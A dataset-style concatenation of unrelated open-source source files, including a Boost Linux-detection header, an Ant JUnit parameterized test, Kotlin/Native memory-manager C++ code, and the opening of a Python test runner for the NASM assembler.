NbBundle.getMessage(WLStartServer.class, "MSG_STOP_SERVER_FAILED", serverName));
}
@Override
public void onExit() {
// noop
}
}
}
| 9,538 |
17,104 | /*
Copyright <NAME> 2008-2015
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
#ifndef BOOST_PREDEF_OS_LINUX_H
#define BOOST_PREDEF_OS_LINUX_H
#include <boost/predef/version_number.h>
#include <boost/predef/make.h>
/*`
[heading `BOOST_OS_LINUX`]
[@http://en.wikipedia.org/wiki/Linux Linux] operating system.
[table
[[__predef_symbol__] [__predef_version__]]
[[`linux`] [__predef_detection__]]
[[`__linux`] [__predef_detection__]]
]
*/
#define BOOST_OS_LINUX BOOST_VERSION_NUMBER_NOT_AVAILABLE
#if !defined(BOOST_PREDEF_DETAIL_OS_DETECTED) && ( \
defined(linux) || defined(__linux) \
)
# undef BOOST_OS_LINUX
# define BOOST_OS_LINUX BOOST_VERSION_NUMBER_AVAILABLE
#endif
#if BOOST_OS_LINUX
# define BOOST_OS_LINUX_AVAILABLE
# include <boost/predef/detail/os_detected.h>
#endif
#define BOOST_OS_LINUX_NAME "Linux"
#endif
#include <boost/predef/detail/test.h>
BOOST_PREDEF_DECLARE_TEST(BOOST_OS_LINUX,BOOST_OS_LINUX_NAME)
| 479 |
364 | <gh_stars>100-1000
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package org.apache.tools.ant.taskdefs.optional.junit;
import static org.junit.Assert.assertArrayEquals;
import org.junit.Test;
import org.junit.experimental.runners.Enclosed;
import org.junit.runner.RunWith;
import org.junit.runners.Parameterized;
import org.junit.runners.Parameterized.Parameter;
import org.junit.runners.Parameterized.Parameters;
import java.util.Arrays;
import java.util.Collection;
/**
*
* @author <NAME>
*/
@RunWith(Enclosed.class)
public class BatchTestTest {
@RunWith(Parameterized.class)
public static class IllegalArgumentTest {
// requires JUnit 4.12
@Parameters(name = "illegal argument: |{0}|")
public static Collection<String> data() {
return Arrays.asList(null, ",", " ,", ", ", " , ",
",a", " ,a", " ,a", " , a", " ,a ", " ,a ,",
"ab,,cd", "ab, ,cd", "ab, ,cd", "ab, ,cd,", ",ab, ,cd,",
/* illegal Java identifiers: */
"1", "1a", "1ab", "1abc", "1abc d", "1abc de", "1abc def", "1abc def,",
",1abc def");
}
@Parameter
public String argument;
/**
* Expected failure when the parameter is illegal
*/
@Test(expected = IllegalArgumentException.class)
public void testParseTestMethodNamesList() {
JUnitTest.parseTestMethodNamesList(argument);
}
}
@RunWith(Parameterized.class)
public static class LegalArgumentTest {
@Parameters(name = "legal argument: |{0}|")
public static Collection<Object[]> data() {
return Arrays.asList(new Object[][] {
{"", new String[0]}, {" ", new String[0]}, {" ", new String[0]},
{"abc", new String[]{"abc"}}, {"abc ", new String[]{"abc"}},
{" abc", new String[]{"abc"}}, {" abc ", new String[]{"abc"}},
{"abc ", new String[]{"abc"}}, {"abc,", new String[]{"abc"}},
{"abc, ", new String[]{"abc"}}, {"abc ,", new String[]{"abc"}},
{"abc , ", new String[]{"abc"}}, {" abc ,", new String[]{"abc"}},
/* legal Java identifiers: */
{"a", new String[]{"a"}}, {"a1", new String[]{"a1"}},
{"a$", new String[]{"a$"}}, {"a$1", new String[]{"a$1"}},
{"_bc", new String[]{"_bc"}}, {"___", new String[]{"___"}},
{"abc,def", new String[]{"abc", "def"}},
{"abc,def,", new String[]{"abc", "def"}},
{"abc,def ", new String[]{"abc", "def"}},
{"abc, def", new String[]{"abc", "def"}},
{"abc, def ", new String[]{"abc", "def"}},
{"abc ,def", new String[]{"abc", "def"}},
{"abc ,def ", new String[]{"abc", "def"}},
{"abc , def", new String[]{"abc", "def"}},
{"abc , def ", new String[]{"abc", "def"}},
{" abc,def", new String[]{"abc", "def"}},
{" abc,def ", new String[]{"abc", "def"}},
{" abc, def", new String[]{"abc", "def"}},
{" abc, def ", new String[]{"abc", "def"}},
{" abc ,def", new String[]{"abc", "def"}},
{" abc ,def ", new String[]{"abc", "def"}},
{" abc , def", new String[]{"abc", "def"}},
{" abc , def ", new String[]{"abc", "def"}},
{" abc , def ,", new String[]{"abc", "def"}},
});
}
@Parameter
public String argument;
@Parameter(1)
public String[] result;
@Test
public void testParseTestMethodNamesList() {
assertArrayEquals(result, JUnitTest.parseTestMethodNamesList(argument));
}
}
}
| 2,137 |
7,137 | package io.onedev.server.entitymanager;
import java.util.List;
import java.util.Map;
import io.onedev.server.model.Agent;
import io.onedev.server.model.AgentAttribute;
import io.onedev.server.persistence.dao.EntityManager;
public interface AgentAttributeManager extends EntityManager<AgentAttribute> {
List<String> getAttributeNames();
void syncAttributes(Agent agent, Map<String, String> attributeMap);
}
| 124 |
45,293 | <gh_stars>1000+
/*
* Copyright 2010-2020 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license
* that can be found in the LICENSE file.
*/
#include "Memory.h"
#include "MemoryPrivate.hpp"
#include "Exceptions.h"
#include "ExtraObjectData.hpp"
#include "Freezing.hpp"
#include "GC.hpp"
#include "GlobalsRegistry.hpp"
#include "InitializationScheme.hpp"
#include "KAssert.h"
#include "Natives.h"
#include "ObjectOps.hpp"
#include "Porting.h"
#include "Runtime.h"
#include "StableRefRegistry.hpp"
#include "ThreadData.hpp"
#include "ThreadRegistry.hpp"
#include "ThreadState.hpp"
#include "Utils.hpp"
using namespace kotlin;
// TODO: This name does not make sense anymore.
// Delete all means of creating this type directly as it only serves
// as a typedef for `mm::StableRefRegistry::Node`.
class ForeignRefManager : Pinned {
public:
ForeignRefManager() = delete;
~ForeignRefManager() = delete;
};
namespace {
// `reinterpret_cast` to it and back to the same type
// will yield precisely the same pointer, so it's safe.
ALWAYS_INLINE ForeignRefManager* ToForeignRefManager(mm::StableRefRegistry::Node* data) {
return reinterpret_cast<ForeignRefManager*>(data);
}
ALWAYS_INLINE mm::StableRefRegistry::Node* FromForeignRefManager(ForeignRefManager* manager) {
return reinterpret_cast<mm::StableRefRegistry::Node*>(manager);
}
} // namespace
ObjHeader** ObjHeader::GetWeakCounterLocation() {
return mm::ExtraObjectData::FromMetaObjHeader(this->meta_object()).GetWeakCounterLocation();
}
#ifdef KONAN_OBJC_INTEROP
void* ObjHeader::GetAssociatedObject() {
if (!has_meta_object()) {
return nullptr;
}
return *GetAssociatedObjectLocation();
}
void** ObjHeader::GetAssociatedObjectLocation() {
return mm::ExtraObjectData::FromMetaObjHeader(this->meta_object()).GetAssociatedObjectLocation();
}
void ObjHeader::SetAssociatedObject(void* obj) {
*GetAssociatedObjectLocation() = obj;
}
#endif // KONAN_OBJC_INTEROP
// static
MetaObjHeader* ObjHeader::createMetaObject(ObjHeader* object) {
return mm::ExtraObjectData::Install(object).AsMetaObjHeader();
}
// static
void ObjHeader::destroyMetaObject(ObjHeader* object) {
mm::ExtraObjectData::Uninstall(object);
}
ALWAYS_INLINE bool isPermanentOrFrozen(const ObjHeader* obj) {
// TODO: Freeze TF_IMMUTABLE objects upon creation.
return mm::IsFrozen(obj) || ((obj->type_info()->flags_ & TF_IMMUTABLE) != 0);
}
ALWAYS_INLINE bool isShareable(const ObjHeader* obj) {
// TODO: Remove when legacy MM is gone.
return true;
}
extern "C" MemoryState* InitMemory(bool firstRuntime) {
return mm::ToMemoryState(mm::ThreadRegistry::Instance().RegisterCurrentThread());
}
extern "C" void DeinitMemory(MemoryState* state, bool destroyRuntime) {
// We need the native state to avoid a deadlock on unregistering the thread.
// The deadlock is possible if we are in the runnable state and the GC already locked
// the thread registery and waits for threads to suspend or go to the native state.
AssertThreadState(state, ThreadState::kNative);
auto* node = mm::FromMemoryState(state);
if (destroyRuntime) {
ThreadStateGuard guard(state, ThreadState::kRunnable);
node->Get()->gc().PerformFullGC();
// TODO: Also make sure that finalizers are run.
}
mm::ThreadRegistry::Instance().Unregister(node);
if (destroyRuntime) {
mm::ThreadRegistry::ClearCurrentThreadData();
}
}
extern "C" void RestoreMemory(MemoryState*) {
// TODO: Remove when legacy MM is gone.
}
extern "C" void ClearMemoryForTests(MemoryState* state) {
state->GetThreadData()->ClearForTests();
}
extern "C" RUNTIME_NOTHROW OBJ_GETTER(AllocInstance, const TypeInfo* typeInfo) {
auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
RETURN_RESULT_OF(mm::AllocateObject, threadData, typeInfo);
}
extern "C" OBJ_GETTER(AllocArrayInstance, const TypeInfo* typeInfo, int32_t elements) {
if (elements < 0) {
ThrowIllegalArgumentException();
}
auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
RETURN_RESULT_OF(mm::AllocateArray, threadData, typeInfo, static_cast<uint32_t>(elements));
}
extern "C" ALWAYS_INLINE OBJ_GETTER(InitThreadLocalSingleton, ObjHeader** location, const TypeInfo* typeInfo, void (*ctor)(ObjHeader*)) {
auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
RETURN_RESULT_OF(mm::InitThreadLocalSingleton, threadData, location, typeInfo, ctor);
}
extern "C" ALWAYS_INLINE OBJ_GETTER(InitSingleton, ObjHeader** location, const TypeInfo* typeInfo, void (*ctor)(ObjHeader*)) {
auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
RETURN_RESULT_OF(mm::InitSingleton, threadData, location, typeInfo, ctor);
}
extern "C" RUNTIME_NOTHROW void InitAndRegisterGlobal(ObjHeader** location, const ObjHeader* initialValue) {
auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
AssertThreadState(threadData, ThreadState::kRunnable);
mm::GlobalsRegistry::Instance().RegisterStorageForGlobal(threadData, location);
// Null `initialValue` means that the appropriate value was already set by static initialization.
if (initialValue != nullptr) {
mm::SetHeapRef(location, const_cast<ObjHeader*>(initialValue));
}
}
extern "C" const MemoryModel CurrentMemoryModel = MemoryModel::kExperimental;
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void SetStackRef(ObjHeader** location, const ObjHeader* object) {
mm::SetStackRef(location, const_cast<ObjHeader*>(object));
}
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void SetHeapRef(ObjHeader** location, const ObjHeader* object) {
mm::SetHeapRef(location, const_cast<ObjHeader*>(object));
}
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void ZeroHeapRef(ObjHeader** location) {
mm::SetHeapRef(location, nullptr);
}
extern "C" RUNTIME_NOTHROW void ZeroArrayRefs(ArrayHeader* array) {
for (uint32_t index = 0; index < array->count_; ++index) {
ObjHeader** location = ArrayAddressOfElementAt(array, index);
mm::SetHeapRef(location, nullptr);
}
}
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void ZeroStackRef(ObjHeader** location) {
mm::SetStackRef(location, nullptr);
}
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void UpdateStackRef(ObjHeader** location, const ObjHeader* object) {
mm::SetStackRef(location, const_cast<ObjHeader*>(object));
}
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void UpdateHeapRef(ObjHeader** location, const ObjHeader* object) {
mm::SetHeapRef(location, const_cast<ObjHeader*>(object));
}
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void UpdateHeapRefIfNull(ObjHeader** location, const ObjHeader* object) {
if (object == nullptr) return;
ObjHeader* result = nullptr; // No need to store this value in a rootset.
mm::CompareAndSwapHeapRef(location, nullptr, const_cast<ObjHeader*>(object), &result);
}
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void UpdateHeapRefsInsideOneArray(const ArrayHeader* array, int fromIndex,
int toIndex, int count) {
RuntimeFail("Only for legacy MM");
}
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void UpdateReturnRef(ObjHeader** returnSlot, const ObjHeader* object) {
mm::SetStackRef(returnSlot, const_cast<ObjHeader*>(object));
}
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW OBJ_GETTER(
SwapHeapRefLocked, ObjHeader** location, ObjHeader* expectedValue, ObjHeader* newValue, int32_t* spinlock, int32_t* cookie) {
RETURN_RESULT_OF(mm::CompareAndSwapHeapRef, location, expectedValue, newValue);
}
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void SetHeapRefLocked(
ObjHeader** location, ObjHeader* newValue, int32_t* spinlock, int32_t* cookie) {
mm::SetHeapRefAtomic(location, newValue);
}
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW OBJ_GETTER(ReadHeapRefLocked, ObjHeader** location, int32_t* spinlock, int32_t* cookie) {
RETURN_RESULT_OF(mm::ReadHeapRefAtomic, location);
}
extern "C" OBJ_GETTER(ReadHeapRefNoLock, ObjHeader* object, int32_t index) {
// TODO: Remove when legacy MM is gone.
ThrowNotImplementedError();
}
extern "C" RUNTIME_NOTHROW void EnterFrame(ObjHeader** start, int parameters, int count) {
auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
AssertThreadState(threadData, ThreadState::kRunnable);
threadData->shadowStack().EnterFrame(start, parameters, count);
}
extern "C" RUNTIME_NOTHROW void LeaveFrame(ObjHeader** start, int parameters, int count) {
auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
AssertThreadState(threadData, ThreadState::kRunnable);
threadData->shadowStack().LeaveFrame(start, parameters, count);
}
extern "C" RUNTIME_NOTHROW void AddTLSRecord(MemoryState* memory, void** key, int size) {
memory->GetThreadData()->tls().AddRecord(key, size);
}
extern "C" RUNTIME_NOTHROW void CommitTLSStorage(MemoryState* memory) {
memory->GetThreadData()->tls().Commit();
}
extern "C" RUNTIME_NOTHROW void ClearTLS(MemoryState* memory) {
memory->GetThreadData()->tls().Clear();
}
extern "C" RUNTIME_NOTHROW ObjHeader** LookupTLS(void** key, int index) {
return mm::ThreadRegistry::Instance().CurrentThreadData()->tls().Lookup(key, index);
}
extern "C" RUNTIME_NOTHROW void GC_RegisterWorker(void* worker) {
// TODO: Remove when legacy MM is gone.
// Nothing to do
}
extern "C" RUNTIME_NOTHROW void GC_UnregisterWorker(void* worker) {
// TODO: Remove when legacy MM is gone.
// Nothing to do
}
extern "C" RUNTIME_NOTHROW void GC_CollectorCallback(void* worker) {
// TODO: Remove when legacy MM is gone.
// Nothing to do
}
extern "C" void Kotlin_native_internal_GC_collect(ObjHeader*) {
auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
threadData->gc().PerformFullGC();
}
extern "C" void Kotlin_native_internal_GC_collectCyclic(ObjHeader*) {
// TODO: Remove when legacy MM is gone.
ThrowIllegalArgumentException();
}
// TODO: Maybe a pair of suspend/resume or start/stop may be useful in the future?
// The other pair is likely to be removed.
extern "C" void Kotlin_native_internal_GC_suspend(ObjHeader*) {
// Nothing to do
}
extern "C" void Kotlin_native_internal_GC_resume(ObjHeader*) {
// Nothing to do
}
extern "C" void Kotlin_native_internal_GC_stop(ObjHeader*) {
// Nothing to do
}
extern "C" void Kotlin_native_internal_GC_start(ObjHeader*) {
// Nothing to do
}
extern "C" void Kotlin_native_internal_GC_setThreshold(ObjHeader*, int32_t value) {
if (value < 0) {
ThrowIllegalArgumentException();
}
mm::GlobalData::Instance().gcScheduler().config().threshold = static_cast<size_t>(value);
}
extern "C" int32_t Kotlin_native_internal_GC_getThreshold(ObjHeader*) {
auto threshold = mm::GlobalData::Instance().gcScheduler().config().threshold.load();
auto maxValue = std::numeric_limits<int32_t>::max();
if (threshold > static_cast<size_t>(maxValue)) {
return maxValue;
}
return static_cast<int32_t>(maxValue);
}
extern "C" void Kotlin_native_internal_GC_setCollectCyclesThreshold(ObjHeader*, int64_t value) {
// TODO: Remove when legacy MM is gone.
ThrowIllegalArgumentException();
}
extern "C" int64_t Kotlin_native_internal_GC_getCollectCyclesThreshold(ObjHeader*) {
// TODO: Remove when legacy MM is gone.
ThrowIllegalArgumentException();
}
extern "C" void Kotlin_native_internal_GC_setThresholdAllocations(ObjHeader*, int64_t value) {
if (value < 0) {
ThrowIllegalArgumentException();
}
mm::GlobalData::Instance().gcScheduler().config().allocationThresholdBytes = static_cast<size_t>(value);
}
extern "C" int64_t Kotlin_native_internal_GC_getThresholdAllocations(ObjHeader*) {
auto threshold = mm::GlobalData::Instance().gcScheduler().config().allocationThresholdBytes.load();
auto maxValue = std::numeric_limits<int64_t>::max();
if (threshold > static_cast<size_t>(maxValue)) {
return maxValue;
}
return static_cast<int64_t>(maxValue);
}
extern "C" void Kotlin_native_internal_GC_setTuneThreshold(ObjHeader*, KBoolean value) {
mm::GlobalData::Instance().gcScheduler().config().autoTune = value;
}
extern "C" KBoolean Kotlin_native_internal_GC_getTuneThreshold(ObjHeader*) {
return mm::GlobalData::Instance().gcScheduler().config().autoTune.load();
}
extern "C" OBJ_GETTER(Kotlin_native_internal_GC_detectCycles, ObjHeader*) {
// TODO: Remove when legacy MM is gone.
RETURN_OBJ(nullptr);
}
extern "C" OBJ_GETTER(Kotlin_native_internal_GC_findCycle, ObjHeader*, ObjHeader* root) {
// TODO: Remove when legacy MM is gone.
RETURN_OBJ(nullptr);
}
extern "C" bool Kotlin_native_internal_GC_getCyclicCollector(ObjHeader* gc) {
// TODO: Remove when legacy MM is gone.
return false;
}
extern "C" void Kotlin_native_internal_GC_setCyclicCollector(ObjHeader* gc, bool value) {
// TODO: Remove when legacy MM is gone.
if (value)
ThrowIllegalArgumentException();
}
extern "C" bool Kotlin_Any_isShareable(ObjHeader* thiz) {
// TODO: Remove when legacy MM is gone.
return true;
}
extern "C" void Kotlin_Any_share(ObjHeader* thiz) {
// TODO: Remove when legacy MM is gone.
// Nothing to do
}
extern "C" RUNTIME_NOTHROW void PerformFullGC(MemoryState* memory) {
memory->GetThreadData()->gc().PerformFullGC();
}
extern "C" bool TryAddHeapRef(const ObjHeader* object) {
RuntimeFail("Only for legacy MM");
}
extern "C" RUNTIME_NOTHROW void ReleaseHeapRefNoCollect(const ObjHeader* object) {
RuntimeFail("Only for legacy MM");
}
extern "C" RUNTIME_NOTHROW OBJ_GETTER(TryRef, ObjHeader* object) {
// TODO: With CMS this needs:
// * during marking phase if `object` is unmarked: barrier (might be automatic because of the stack write)
// and return `object`;
// * during marking phase if `object` is marked: return `object`;
// * during sweeping phase if `object` is unmarked: return nullptr;
// * during sweeping phase if `object` is marked: return `object`;
RETURN_OBJ(object);
}
extern "C" RUNTIME_NOTHROW bool ClearSubgraphReferences(ObjHeader* root, bool checked) {
// TODO: Remove when legacy MM is gone.
return true;
}
extern "C" RUNTIME_NOTHROW void* CreateStablePointer(ObjHeader* object) {
if (!object)
return nullptr;
auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
return mm::StableRefRegistry::Instance().RegisterStableRef(threadData, object);
}
extern "C" RUNTIME_NOTHROW void DisposeStablePointer(void* pointer) {
DisposeStablePointerFor(kotlin::mm::GetMemoryState(), pointer);
}
extern "C" RUNTIME_NOTHROW void DisposeStablePointerFor(MemoryState* memoryState, void* pointer) {
if (!pointer)
return;
auto* node = static_cast<mm::StableRefRegistry::Node*>(pointer);
mm::StableRefRegistry::Instance().UnregisterStableRef(memoryState->GetThreadData(), node);
}
extern "C" RUNTIME_NOTHROW OBJ_GETTER(DerefStablePointer, void* pointer) {
if (!pointer)
RETURN_OBJ(nullptr);
auto* node = static_cast<mm::StableRefRegistry::Node*>(pointer);
ObjHeader* object = **node;
RETURN_OBJ(object);
}
extern "C" RUNTIME_NOTHROW OBJ_GETTER(AdoptStablePointer, void* pointer) {
if (!pointer)
RETURN_OBJ(nullptr);
auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
auto* node = static_cast<mm::StableRefRegistry::Node*>(pointer);
ObjHeader* object = **node;
// Make sure `object` stays in the rootset: put it on the stack before removing it from `StableRefRegistry`.
mm::SetStackRef(OBJ_RESULT, object);
mm::StableRefRegistry::Instance().UnregisterStableRef(threadData, node);
return object;
}
extern "C" void MutationCheck(ObjHeader* obj) {
if (obj->local()) return;
if (!isPermanentOrFrozen(obj)) return;
ThrowInvalidMutabilityException(obj);
}
extern "C" RUNTIME_NOTHROW void CheckLifetimesConstraint(ObjHeader* obj, ObjHeader* pointee) {
// TODO: Consider making it a `RuntimeCheck`. Probably all `RuntimeCheck`s and `RuntimeAssert`s should specify
// that their firing is a compiler bug and should be reported.
if (!obj->local() && pointee != nullptr && pointee->local()) {
konan::consolePrintf("Attempt to store a stack object %p into a heap object %p\n", pointee, obj);
konan::consolePrintf("This is a compiler bug, please report it to https://kotl.in/issue\n");
konan::abort();
}
}
extern "C" void FreezeSubgraph(ObjHeader* obj) {
if (auto* blocker = mm::FreezeSubgraph(obj)) {
ThrowFreezingException(obj, blocker);
}
}
extern "C" void EnsureNeverFrozen(ObjHeader* obj) {
if (!mm::EnsureNeverFrozen(obj)) {
ThrowFreezingException(obj, obj);
}
}
extern "C" ForeignRefContext InitLocalForeignRef(ObjHeader* object) {
AssertThreadState(ThreadState::kRunnable);
// TODO: Remove when legacy MM is gone.
// Nothing to do.
return nullptr;
}
extern "C" ForeignRefContext InitForeignRef(ObjHeader* object) {
AssertThreadState(ThreadState::kRunnable);
auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
auto* node = mm::StableRefRegistry::Instance().RegisterStableRef(threadData, object);
return ToForeignRefManager(node);
}
extern "C" void DeinitForeignRef(ObjHeader* object, ForeignRefContext context) {
AssertThreadState(ThreadState::kRunnable);
RuntimeAssert(context != nullptr, "DeinitForeignRef must not be called for InitLocalForeignRef");
auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
auto* node = FromForeignRefManager(context);
RuntimeAssert(object == **node, "Must correspond to the same object");
mm::StableRefRegistry::Instance().UnregisterStableRef(threadData, node);
}
extern "C" bool IsForeignRefAccessible(ObjHeader* object, ForeignRefContext context) {
// TODO: Remove when legacy MM is gone.
return true;
}
extern "C" void AdoptReferenceFromSharedVariable(ObjHeader* object) {
// TODO: Remove when legacy MM is gone.
// Nothing to do.
}
extern "C" void CheckGlobalsAccessible() {
// TODO: Remove when legacy MM is gone.
// Always accessible
}
extern "C" RUNTIME_NOTHROW ALWAYS_INLINE void Kotlin_mm_safePointFunctionEpilogue() {
auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
AssertThreadState(threadData, ThreadState::kRunnable);
threadData->gc().SafePointFunctionEpilogue();
}
extern "C" RUNTIME_NOTHROW ALWAYS_INLINE void Kotlin_mm_safePointWhileLoopBody() {
auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
AssertThreadState(threadData, ThreadState::kRunnable);
threadData->gc().SafePointLoopBody();
}
extern "C" RUNTIME_NOTHROW ALWAYS_INLINE void Kotlin_mm_safePointExceptionUnwind() {
auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
AssertThreadState(threadData, ThreadState::kRunnable);
threadData->gc().SafePointExceptionUnwind();
}
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void Kotlin_mm_switchThreadStateNative() {
SwitchThreadState(mm::ThreadRegistry::Instance().CurrentThreadData(), ThreadState::kNative);
}
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void Kotlin_mm_switchThreadStateRunnable() {
SwitchThreadState(mm::ThreadRegistry::Instance().CurrentThreadData(), ThreadState::kRunnable);
}
MemoryState* kotlin::mm::GetMemoryState() noexcept {
return ToMemoryState(ThreadRegistry::Instance().CurrentThreadDataNode());
}
bool kotlin::mm::IsCurrentThreadRegistered() noexcept {
return ThreadRegistry::Instance().IsCurrentThreadRegistered();
}
ALWAYS_INLINE kotlin::CalledFromNativeGuard::CalledFromNativeGuard(bool reentrant) noexcept : reentrant_(reentrant) {
Kotlin_initRuntimeIfNeeded();
thread_ = mm::GetMemoryState();
oldState_ = SwitchThreadState(thread_, ThreadState::kRunnable, reentrant_);
}
const bool kotlin::kSupportsMultipleMutators = kotlin::gc::kSupportsMultipleMutators;
| 7,104 |
2,219 | <filename>src/third_party/nasm/travis/nasm-t.py
#!/usr/bin/python3
import subprocess
import argparse
import difflib
import filecmp
import fnmatch
import json
import sys
import re
import os
fmtr_class = argparse.ArgumentDefaultsHelpFormatter
parser = argparse.ArgumentParser(prog = 'nasm-t.py',
formatter_class=fmtr_class)
parser.add_argument('-d', '--directory',
dest = 'dir', default = './travis/test',
help = 'Directory with tests')
parser.add_argument('--nasm',
dest = 'nasm', default = './nasm',
help = 'Nasm executable to use')
parser.add_argument('--hexdump',
dest = 'hexdump', default = '/usr/bin/hexdump',
help = 'Hexdump executable to use')
sp = parser.add_subparsers(dest = 'cmd')
for cmd in ['run']:
spp = sp.add_parser(cmd, help = 'Run test cases')
spp.add_argument('-t', '--test',
dest = 'test',
help = 'Run the selected test only',
required = False)
for cmd in ['list']:
spp = sp.add_parser(cmd, help = 'List test cases')
for cmd in ['update']:
spp = sp.add_parser(cmd, help = 'Update test cases with new compiler')
spp.add_argument('-t', '--test',
dest = 'test',
help = 'Update the selected test only',
required = False)
args = parser.parse_args()
if args.cmd == None:
parser.print_help()
sys.exit(1)
def read_stdfile(path):
with open(path, "rb") as f:
data = f.read().decode("utf-8").strip("\n")
f.close()
return data
#
# Check if descriptor has mandatory fields
def is_valid_desc(desc):
if desc == None:
return False
if 'description' not in desc:
return False
if desc['description'] == "":
return False
return True
#
# Expand ref/id in descriptors array
def expand_templates(desc_array):
desc_ids = { }
for d in desc_array:
if 'id' in d:
desc_ids[d['id']] = d
for i, d in enumerate(desc_array):
if 'ref' in d and d['ref'] in desc_ids:
ref = desc_ids[d['ref']]
own = d.copy()
desc_array[i] = ref.copy()
for k, v in own.items():
desc_array[i][k] = v
del desc_array[i]['id']
return desc_array
def prepare_desc(desc, basedir, name, path):
if not is_valid_desc(desc):
return False
#
# Put private fields
desc['_base-dir'] = basedir
desc['_json-file'] = name
desc['_json-path'] = path
desc['_test-name'] = basedir + os.sep + name[:-5]
#
# If no target provided never update
if 'target' not in desc:
desc['target'] = []
desc['update'] = 'false'
#
# Which code to expect when nasm finishes
desc['_wait'] = 0
if 'error' in desc:
if desc['error'] == 'expected':
desc['_wait'] = 1
#
# Walk over targets and generate match templates
# if were not provided yet
for d in desc['target']:
if 'output' in d and not 'match' in d:
d['match'] = d['output'] + ".t"
return True
def read_json(path):
desc = None
try:
with open(path, "rb") as f:
try:
desc = json.loads(f.read().decode("utf-8").strip("\n"))
except:
desc = None
finally:
f.close()
except:
pass
return desc
def read_desc(basedir, name):
path = basedir + os.sep + name
desc = read_json(path)
desc_array = []
if type(desc) == dict:
if prepare_desc(desc, basedir, name, path) == True:
desc_array += [desc]
elif type(desc) == list:
expand_templates(desc)
for de in desc:
if prepare_desc(de, basedir, name, path) == True:
desc_array += [de]
return desc_array
def collect_test_desc_from_file(path):
if not fnmatch.fnmatch(path, '*.json'):
path += '.json'
basedir = os.path.dirname(path)
filename = os.path.basename(path)
return read_desc(basedir, filename)
def collect_test_desc_from_dir(basedir):
desc_array = []
if os.path.isdir(basedir):
for filename in os.listdir(basedir):
if os.path.isdir(basedir + os.sep + filename):
desc_array += collect_test_desc_from_dir(basedir + os.sep + filename)
elif fnmatch.fnmatch(filename, '*.json'):
desc = read_desc(basedir, filename)
if desc == None:
continue
desc_array += desc
desc_array.sort(key=lambda x: x['_test-name'])
return desc_array
if args.cmd == 'list':
fmt_entry = '%-32s %s'
desc_array = collect_test_desc_from_dir(args.dir)
print(fmt_entry % ('Name', 'Description'))
for desc in desc_array:
print(fmt_entry % (desc['_test-name'], desc['description']))
def test_abort(test, message):
print("\t%s: %s" % (test, message))
print("=== Test %s ABORT ===" % (test))
sys.exit(1)
return False
def test_fail(test, message):
print("\t%s: %s" % (test, message))
print("=== Test %s FAIL ===" % (test))
return False
def test_skip(test, message):
print("\t%s: %s" % (test, message))
print("=== Test %s SKIP ===" % (test))
return True
def test_over(test):
print("=== Test %s ERROR OVER ===" % (test))
return True
def test_pass(test):
print("=== Test %s PASS ===" % (test))
return True
def test_updated(test):
print("=== Test %s UPDATED ===" % (test))
return True
def run_hexdump(path):
p = subprocess.Popen([args.hexdump, "-C", path],
stdout = subprocess.PIPE,
close_fds = True)
if p.wait() == 0:
return p
return None
def show_std(stdname, data):
print("\t--- %s" % (stdname))
for i in data.split("\n"):
print("\t%s" % i)
print("\t---")
def cmp_std(from_name, from_data, match_name, match_data):
if from_data != match_data:
print("\t--- %s" % (from_name))
for i in from_data.split("\n"):
print("\t%s" % i)
print("\t--- %s" % (match_name))
for i in match_data.split("\n"):
print("\t%s" % i)
diff = difflib.unified_diff(from_data.split("\n"), match_data.split("\n"),
fromfile = from_name, tofile = match_name)
for i in diff:
print("\t%s" % i.strip("\n"))
print("\t---")
return False
return True
def show_diff(test, patha, pathb):
pa = run_hexdump(patha)
pb = run_hexdump(pathb)
if pa == None or pb == None:
return test_fail(test, "Can't create dumps")
sa = pa.stdout.read().decode("utf-8").strip("\n")
sb = pb.stdout.read().decode("utf-8").strip("\n")
print("\t--- hexdump %s" % (patha))
for i in sa.split("\n"):
print("\t%s" % i)
print("\t--- hexdump %s" % (pathb))
for i in sb.split("\n"):
print("\t%s" % i)
pa.stdout.close()
pb.stdout.close()
diff = difflib.unified_diff(sa.split("\n"), sb.split("\n"),
fromfile = patha, tofile = pathb)
for i in diff:
print("\t%s" % i.strip("\n"))
print("\t---")
return True
def prepare_run_opts(desc):
opts = []
if 'format' in desc:
opts += ['-f', desc['format']]
if 'option' in desc:
opts += desc['option'].split(" ")
